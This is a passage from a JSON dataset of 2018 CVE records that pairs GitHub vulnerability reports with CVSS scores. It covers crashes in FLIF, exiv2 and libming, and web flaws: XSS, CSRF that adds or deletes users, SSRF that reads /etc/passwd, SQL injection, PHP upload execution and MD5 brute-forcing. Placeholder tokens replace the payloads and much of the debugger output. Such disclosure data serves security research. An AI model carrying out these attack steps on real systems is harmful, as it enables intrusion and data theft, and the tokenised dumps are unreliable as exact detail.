  19015. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19016. "severity": "MEDIUM",
  19017. "baseScore": 6.5,
  19018. "impactScore": 3.6,
  19019. "exploitabilityScore": 2.8
  19020. },
  19021. {
  19022. "CVE_ID": "CVE-2018-10971",
  19023. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/501",
  19024. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/501",
  19025. "Repo_new": "flif-hub/flif",
  19026. "Issue_Created_At": "2018-05-08T03:43:44Z",
  19027. "description": "BUG Program received signal SIGSEGV, Segmentation fault. I used the AFL tool to find the bug of the APITAG method, The following is which is the gdb stack FILETAG Then the following is gdb's instructions and registers (gdb) x/i $pc NUMBERTAG ac NUMBERTAG a <image_load_pnm(char const , Image NUMBERTAG mov (%rdi),%r NUMBERTAG gdb) i r ra NUMBERTAG ffffffff NUMBERTAG rb NUMBERTAG ffffffff NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffdd NUMBERTAG fffffffdd NUMBERTAG r NUMBERTAG ffff7fca NUMBERTAG r NUMBERTAG f6c6c NUMBERTAG r NUMBERTAG fffffffdb NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffdfb NUMBERTAG r NUMBERTAG fffffe NUMBERTAG rip NUMBERTAG ac NUMBERTAG a NUMBERTAG ac NUMBERTAG a <image_load_pnm(char const , Image NUMBERTAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG",
  19028. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19029. "severity": "MEDIUM",
  19030. "baseScore": 5.5,
  19031. "impactScore": 3.6,
  19032. "exploitabilityScore": 1.8
  19033. },
  19034. {
  19035. "CVE_ID": "CVE-2018-10972",
  19036. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/503",
  19037. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/503",
  19038. "Repo_new": "flif-hub/flif",
  19039. "Issue_Created_At": "2018-05-08T08:02:04Z",
  19040. "description": "ERROR Segmentation fault APITAG The third Error is also Segmentation fault .I also use AFL tools The error is : Starting program: PATHTAG e PATHTAG APITAG overwrite Warning: expected \".png\", \".pnm\" or \".pam\" file name extension for input file, trying anyway... Program received signal SIGSEGV, Segmentation fault. APITAG (this=<optimized out>, APITAG rac=...) at APITAG",
  19041. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19042. "severity": "HIGH",
  19043. "baseScore": 7.8,
  19044. "impactScore": 5.9,
  19045. "exploitabilityScore": 1.8
  19046. },
  19047. {
  19048. "CVE_ID": "CVE-2018-1098",
  19049. "Issue_Url_old": "https://github.com/coreos/etcd/issues/9353",
  19050. "Issue_Url_new": "https://github.com/etcd-io/etcd/issues/9353",
  19051. "Repo_new": "etcd-io/etcd",
  19052. "Issue_Created_At": "2018-02-25T11:50:25Z",
  19053. "description": "Mitigate CSRF and DNS Rebinding attacks. After explaining the issue in private with the security mailing list, we determined it is low enough in severity to make it a public discussion. This issue is relevant only to etcd deployments on local networks with no authentication scheme set up. It may not be a common scenario but it affects anyone who works with etcd locally or on a local network and uses it without authentication, which is the default. For the sake of demonstration, I'm using a scenario where etcd is deployed on localhost. This can be any LAN address though (the attacker would have to know the address as a prerequisite, but localhost is pretty common). The first issue is with CSRF URLTAG . An attacker can set up a website that tries to send a POST request to the etcd server and modify a key. Adding a key is done with PUT so it is theoretically safe (can't PUT from an HTML form or such) but POST allows creating in-order keys that an attacker can send. Example APITAG CODETAG The second issue is with DNS rebinding URLTAG . It essentially means an attacker can control his DNS records to direct to localhost, and trick the browser into sending requests to localhost (or any other address). There are many resources on how this attack works. I've set up a live APITAG at FILETAG (based on taviso's work CVETAG . If the issue is unclear though please let me know and I will explain the attack in further detail. Success example: FILETAG Whitelisting hostnames is a possible simple solution. See taviso's comment CVETAG on this or the fix URLTAG he sent to Transmission.",
  19054. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19055. "severity": "HIGH",
  19056. "baseScore": 8.8,
  19057. "impactScore": 5.9,
  19058. "exploitabilityScore": 2.8
  19059. },
  19060. {
  19061. "CVE_ID": "CVE-2018-10998",
  19062. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/303",
  19063. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/303",
  19064. "Repo_new": "exiv2/exiv2",
  19065. "Issue_Created_At": "2018-05-10T01:16:20Z",
  19066. "description": "SIGABRT in src/jp2image.cpp Safe::add. RA NUMBERTAG RB NUMBERTAG ec0d NUMBERTAG APITAG in addition\") RC NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG RD NUMBERTAG RSI NUMBERTAG RDI NUMBERTAG RBP NUMBERTAG e NUMBERTAG c NUMBERTAG ffff6ccb NUMBERTAG fbad NUMBERTAG RSP NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a ( APITAG : mov rdx,QWORD PTR fs NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG R NUMBERTAG ffff6ccc NUMBERTAG R NUMBERTAG ffff7fd NUMBERTAG ffff7fd NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG ec0aa NUMBERTAG R NUMBERTAG ba NUMBERTAG b NUMBERTAG e0 APITAG lea rsp, rsp NUMBERTAG R NUMBERTAG fffffffd NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG : mov ea NUMBERTAG ea NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : movsxd rdi,ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : syscall NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG : ja NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : repz ret NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : nop WORD PTR [rax+ra NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : test ecx,ecx [ stack NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a ( APITAG : mov rdx,QWORD PTR fs NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcfa NUMBERTAG fffffffcfa NUMBERTAG fffffffcfb NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGABRT NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. 
[ Legend: Modified register | Code | Heap | Stack | String ] APITAG registers ]\u2500\u2500\u2500\u2500 $ra NUMBERTAG rb NUMBERTAG ec0d NUMBERTAG APITAG in addition\" $rc NUMBERTAG ffff NUMBERTAG b NUMBERTAG fffff NUMBERTAG d NUMBERTAG H=\"?) $rd NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 APITAG mov rdx, QWORD PTR fs NUMBERTAG rbp NUMBERTAG e NUMBERTAG c NUMBERTAG ffff6ccb NUMBERTAG fbad NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rip NUMBERTAG ffff NUMBERTAG b NUMBERTAG fffff NUMBERTAG d NUMBERTAG H=\"?) $r NUMBERTAG ffff6ccc NUMBERTAG r NUMBERTAG ffff7fd NUMBERTAG ffff7fd NUMBERTAG loop detected] $r NUMBERTAG r NUMBERTAG r NUMBERTAG ec0aa NUMBERTAG r NUMBERTAG ba NUMBERTAG b NUMBERTAG e0 \u2192 APITAG lea rsp, [rsp NUMBERTAG r NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG eflags: [carry parity adjust zero sign trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $gs NUMBERTAG fs NUMBERTAG ss NUMBERTAG b $ds NUMBERTAG es NUMBERTAG cs NUMBERTAG APITAG stack NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 APITAG mov rdx, QWORD PTR fs NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcfa NUMBERTAG fffffffcfa NUMBERTAG fffffffcfb NUMBERTAG APITAG code:i NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG mov ea NUMBERTAG ea NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG movsxd rdi, ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG syscall NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG cmp ra NUMBERTAG fffffffffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG ja NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG repz ret NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG nop WORD PTR [rax+ra NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG test ecx, ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG a APITAG jg NUMBERTAG ffff NUMBERTAG b NUMBERTAG b APITAG APITAG threads NUMBERTAG Id NUMBERTAG Name: \"exi NUMBERTAG stopped, reason: SIGABRT 
APITAG trace NUMBERTAG ffff NUMBERTAG b NUMBERTAG Name: __GI_raise(sig NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 Name: APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG d \u2192 Name: APITAG NUMBERTAG ffff NUMBERTAG c6b6 \u2192 call NUMBERTAG ffff NUMBERTAG fc0 APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG Name: APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG Name: APITAG NUMBERTAG c6a \u2192 Name: Safe::add<unsigned int>(summand NUMBERTAG summand NUMBERTAG optimized out NUMBERTAG c6a \u2192 Name: APITAG out NUMBERTAG ab NUMBERTAG Name: APITAG NUMBERTAG fa0 \u2192 Name: APITAG PATHTAG ) command: exi NUMBERTAG et [poc] [ URLTAG url",
  19067. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19068. "severity": "MEDIUM",
  19069. "baseScore": 6.5,
  19070. "impactScore": 3.6,
  19071. "exploitabilityScore": 2.8
  19072. },
  19073. {
  19074. "CVE_ID": "CVE-2018-10999",
  19075. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/306",
  19076. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/306",
  19077. "Repo_new": "exiv2/exiv2",
  19078. "Issue_Created_At": "2018-05-10T09:43:16Z",
  19079. "description": "heap buffer overflow on APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG f NUMBERTAG at pc NUMBERTAG fa NUMBERTAG d NUMBERTAG b NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG ERRORTAG NUMBERTAG b0 sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG f NUMBERTAG thread T NUMBERTAG fa NUMBERTAG d NUMBERTAG b NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG fa NUMBERTAG d3ce8bf in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG d3ced0a in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG d3cb NUMBERTAG in APITAG ( PATHTAG NUMBERTAG in APITAG const ( PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG dbd in main ( PATHTAG NUMBERTAG fa NUMBERTAG c8f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG a NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fa NUMBERTAG d7a NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG fa NUMBERTAG d3cae NUMBERTAG in APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffbe NUMBERTAG c NUMBERTAG fffbea NUMBERTAG c NUMBERTAG fffbeb NUMBERTAG c NUMBERTAG fffbec NUMBERTAG c NUMBERTAG fffbed NUMBERTAG c NUMBERTAG fffbee NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application 
bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING command: exi NUMBERTAG et [poc] [ URLTAG url",
  19080. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19081. "severity": "MEDIUM",
  19082. "baseScore": 6.5,
  19083. "impactScore": 3.6,
  19084. "exploitabilityScore": 2.8
  19085. },
  19086. {
  19087. "CVE_ID": "CVE-2018-11011",
  19088. "Issue_Url_old": "https://github.com/ruibaby/halo/issues/9",
  19089. "Issue_Url_new": "https://github.com/ruibaby/halo/issues/9",
  19090. "Repo_new": "ruibaby/halo",
  19091. "Issue_Created_At": "2018-05-11T09:43:02Z",
  19092. "description": "These are two stored XSS vulnerabilities. The first place > The front-end comment APITAG field is not strictly filtered. Vulnerability code > APITAG CODETAG Payload APITAG Second place > When a login fails in the admin backend, the failed login username and password are written to the log without XSS filtering and displayed on the backend home page, resulting in a stored XSS vulnerability. Vulnerability code > APITAG ERRORTAG Payload APITAG",
  19093. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19094. "severity": "MEDIUM",
  19095. "baseScore": 6.1,
  19096. "impactScore": 2.7,
  19097. "exploitabilityScore": 2.8
  19098. },
  19099. {
  19100. "CVE_ID": "CVE-2018-11031",
  19101. "Issue_Url_old": "https://github.com/gouguoyin/phprap/issues/89",
  19102. "Issue_Url_new": "https://github.com/gouguoyin/phprap/issues/89",
  19103. "Repo_new": "gouguoyin/phprap",
  19104. "Issue_Created_At": "2018-05-11T01:31:20Z",
  19105. "description": "There are SSRF and SQL injection vulnerabilities that can be used to attack the website and the local area network NUMBERTAG SSRF vulnerability file: PATHTAG NUMBERTAG line ERRORTAG This method does not restrict HTTP requests to intranet addresses, which can cause an SSRF attack. For example, the following request APITAG You can see that the server returned the contents of /etc/passwd NUMBERTAG SQL injection file: PATHTAG NUMBERTAG line ERRORTAG you can see on line NUMBERTAG APITAG that string splicing is used to build the SQL statement, which will cause an SQL injection attack",
  19106. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19107. "severity": "CRITICAL",
  19108. "baseScore": 9.8,
  19109. "impactScore": 5.9,
  19110. "exploitabilityScore": 3.9
  19111. },
  19112. {
  19113. "CVE_ID": "CVE-2018-11037",
  19114. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/307",
  19115. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/307",
  19116. "Repo_new": "exiv2/exiv2",
  19117. "Issue_Created_At": "2018-05-13T07:00:35Z",
  19118. "description": "SEGV on APITAG ERRORTAG The command line is exi NUMBERTAG pR FILETAG",
  19119. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  19120. "severity": "MEDIUM",
  19121. "baseScore": 6.5,
  19122. "impactScore": 3.6,
  19123. "exploitabilityScore": 2.8
  19124. },
  19125. {
  19126. "CVE_ID": "CVE-2018-11095",
  19127. "Issue_Url_old": "https://github.com/libming/libming/issues/141",
  19128. "Issue_Url_new": "https://github.com/libming/libming/issues/141",
  19129. "Repo_new": "libming/libming",
  19130. "Issue_Created_At": "2018-05-14T12:56:04Z",
  19131. "description": "SIGSEV in APITAG in APITAG URLTAG URLTAG (gdb) set args POC2 (gdb) r header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG $m APITAG NUMBERTAG m APITAG Stream out of sync after parse of blocktype NUMBERTAG SWF_DOACTION NUMBERTAG but expecting NUMBERTAG SWF_DOACTION / Program received signal SIGSEGV, Segmentation fault NUMBERTAG a1e9 in APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG if (sactif APITAG APITAG APITAG (gdb) bt NUMBERTAG a1e9 in APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG maxn NUMBERTAG at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG a0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG a0, indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG (gdb) info all registers ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG ffffffffffffffb NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe1e NUMBERTAG fffffffe1e0 r NUMBERTAG d NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG a1e NUMBERTAG a1e9 APITAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG Type APITAG to continue, or q APITAG to quit st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG fctrl NUMBERTAG f NUMBERTAG fstat NUMBERTAG ftag 
NUMBERTAG ffff NUMBERTAG fiseg NUMBERTAG fioff NUMBERTAG foseg NUMBERTAG fooff NUMBERTAG fop NUMBERTAG mxcsr NUMBERTAG f NUMBERTAG IM DM ZM OM UM PM ] Breakpoint NUMBERTAG APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG if (sactif APITAG APITAG APITAG (gdb) l NUMBERTAG if APITAG n+i+j, maxn) == SWFACTION_IF NUMBERTAG sactif = (struct SWF_ACTIONIF )&(actions[n+i+j NUMBERTAG chk whether last jump does lead us back to start of loop NUMBERTAG if (sactif APITAG APITAG APITAG NUMBERTAG sactif APITAG APITAG APITAG NUMBERTAG sactif APITAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG",
  19132. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19133. "severity": "HIGH",
  19134. "baseScore": 8.8,
  19135. "impactScore": 5.9,
  19136. "exploitabilityScore": 2.8
  19137. },
  19138. {
  19139. "CVE_ID": "CVE-2018-11097",
  19140. "Issue_Url_old": "https://github.com/cloudwu/cstring/issues/6",
  19141. "Issue_Url_new": "https://github.com/cloudwu/cstring/issues/6",
  19142. "Repo_new": "cloudwu/cstring",
  19143. "Issue_Created_At": "2018-05-14T06:58:46Z",
  19144. "description": "There is a memory leak vulnerability. APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a0 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  19145. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  19146. "severity": "HIGH",
  19147. "baseScore": 7.5,
  19148. "impactScore": 3.6,
  19149. "exploitabilityScore": 3.9
  19150. },
  19151. {
  19152. "CVE_ID": "CVE-2018-11098",
  19153. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/11",
  19154. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/11",
  19155. "Repo_new": "philippe/frogcms",
  19156. "Issue_Created_At": "2018-05-14T03:28:22Z",
  19157. "description": "Frog CMS NUMBERTAG has a file upload Vulnerability. The first step is to click the upload button APITAG The second step is to upload php script APITAG Last successful execution APITAG Look at the file upload function\uff0cthere is a is APITAG APITAG follow the APITAG judgment file type\u3002 APITAG",
  19158. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  19159. "severity": "HIGH",
  19160. "baseScore": 7.2,
  19161. "impactScore": 5.9,
  19162. "exploitabilityScore": 1.2
  19163. },
  19164. {
  19165. "CVE_ID": "CVE-2018-11100",
  19166. "Issue_Url_old": "https://github.com/libming/libming/issues/142",
  19167. "Issue_Url_new": "https://github.com/libming/libming/issues/142",
  19168. "Repo_new": "libming/libming",
  19169. "Issue_Created_At": "2018-05-15T00:29:54Z",
  19170. "description": "SIGSEV in APITAG in APITAG URLTAG Program received signal SIGSEGV, Segmentation fault. APITAG (n NUMBERTAG actions NUMBERTAG cb0, maxn NUMBERTAG is_type2=<optimized out>) at APITAG NUMBERTAG if ( name) (gdb) bt NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG cb0, maxn NUMBERTAG is_type2=<optimized out>) at APITAG NUMBERTAG in APITAG (indent NUMBERTAG actions NUMBERTAG cb0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG (gdb) l NUMBERTAG int action_cnt NUMBERTAG char name NUMBERTAG APITAG NUMBERTAG name = is_type2 ? 
APITAG : sact APITAG NUMBERTAG if ( name NUMBERTAG INDENT NUMBERTAG APITAG {\" ,name NUMBERTAG while(action_cnt+n<maxn) (gdb) info all registers ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG c NUMBERTAG rd NUMBERTAG c NUMBERTAG rsi NUMBERTAG a NUMBERTAG rdi NUMBERTAG c NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG r NUMBERTAG r NUMBERTAG a2ff NUMBERTAG r NUMBERTAG fffffffffffa5c NUMBERTAG r NUMBERTAG ffff NUMBERTAG c NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG cb NUMBERTAG r NUMBERTAG a NUMBERTAG rip NUMBERTAG f NUMBERTAG e NUMBERTAG f NUMBERTAG e APITAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG Type APITAG to continue, or q APITAG to quit st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG fctrl NUMBERTAG f NUMBERTAG fstat NUMBERTAG ftag NUMBERTAG ffff NUMBERTAG fiseg NUMBERTAG fioff NUMBERTAG foseg NUMBERTAG fooff NUMBERTAG fop NUMBERTAG",
  19171. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19172. "severity": "HIGH",
  19173. "baseScore": 8.8,
  19174. "impactScore": 5.9,
  19175. "exploitabilityScore": 2.8
  19176. },
  19177. {
  19178. "CVE_ID": "CVE-2018-11126",
  19179. "Issue_Url_old": "https://github.com/doorgets/CMS/issues/11",
  19180. "Issue_Url_new": "https://github.com/doorgets/cms/issues/11",
  19181. "Repo_new": "doorgets/cms",
  19182. "Issue_Created_At": "2018-05-15T04:50:40Z",
  19183. "description": "There is a CSRF vulnerability that can be used to add an administrator account. Although there is a token field, it does not prevent CSRF attacks. poc\uff1a FILETAG When the victim accesses the maliciously constructed link. FILETAG Successfully added an administrator user and tried to log in. FILETAG",
  19184. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19185. "severity": "HIGH",
  19186. "baseScore": 8.8,
  19187. "impactScore": 5.9,
  19188. "exploitabilityScore": 2.8
  19189. },
  19190. {
  19191. "CVE_ID": "CVE-2018-11127",
  19192. "Issue_Url_old": "https://github.com/e107inc/e107/issues/3128",
  19193. "Issue_Url_new": "https://github.com/e107inc/e107/issues/3128",
  19194. "Repo_new": "e107inc/e107",
  19195. "Issue_Created_At": "2018-05-15T09:29:00Z",
  19196. "description": "There is a CSRF vulnerability in the admin backend, which can lead to arbitrary user deletion. The token is not validated at the backend user-deletion endpoint, so a user can be deleted according to the id number. FILETAG After clicking delete, it will be deleted again. Capture and analyze the packet at this point. FILETAG Analysis shows the token field is not checked. Delete it directly. FILETAG After the token is removed, the request is constructed based on the user id from the annotation. FILETAG After the administrator is lured into clicking, the user with that id is deleted. FILETAG POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG var f = APITAG APITAG APITAG APITAG",
  19197. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  19198. "severity": "MEDIUM",
  19199. "baseScore": 6.5,
  19200. "impactScore": 3.6,
  19201. "exploitabilityScore": 2.8
  19202. },
  19203. {
  19204. "CVE_ID": "CVE-2018-11208",
  19205. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/187",
  19206. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/187",
  19207. "Repo_new": "zblogcn/zblogphp",
  19208. "Issue_Created_At": "2018-05-16T06:35:30Z",
  19209. "description": "There is a cross-site scripting vulnerability. An XSS vulnerability was discovered in the newest zblogphp. There is a persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML in the backend web site settings\uff1a POC\uff1a In the copyright information field\uff0cinsert ERRORTAG FILETAG Then access the website home page to trigger the vulnerability\uff1a FILETAG",
  19210. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  19211. "severity": "MEDIUM",
  19212. "baseScore": 4.8,
  19213. "impactScore": 2.7,
  19214. "exploitabilityScore": 1.7
  19215. },
  19216. {
  19217. "CVE_ID": "CVE-2018-11209",
  19218. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/188",
  19219. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/188",
  19220. "Repo_new": "zblogcn/zblogphp",
  19221. "Issue_Created_At": "2018-05-16T07:38:02Z",
  19222. "description": "Weak hashing\uff08MD5\uff09 leads to brute-force cracking of the admin backend. A simple MD5 hash is used in Z APITAG NUMBERTAG s backend login page, and it uses single-factor authentication\uff0cresulting in a brute-force break-in to the backend. POC: Backend login page\uff1a FILETAG Capture data packets to get the fields\uff0c APITAG FILETAG Then load a dictionary for brute-force cracking\uff1a FILETAG Access the backend of the website\uff1a FILETAG",
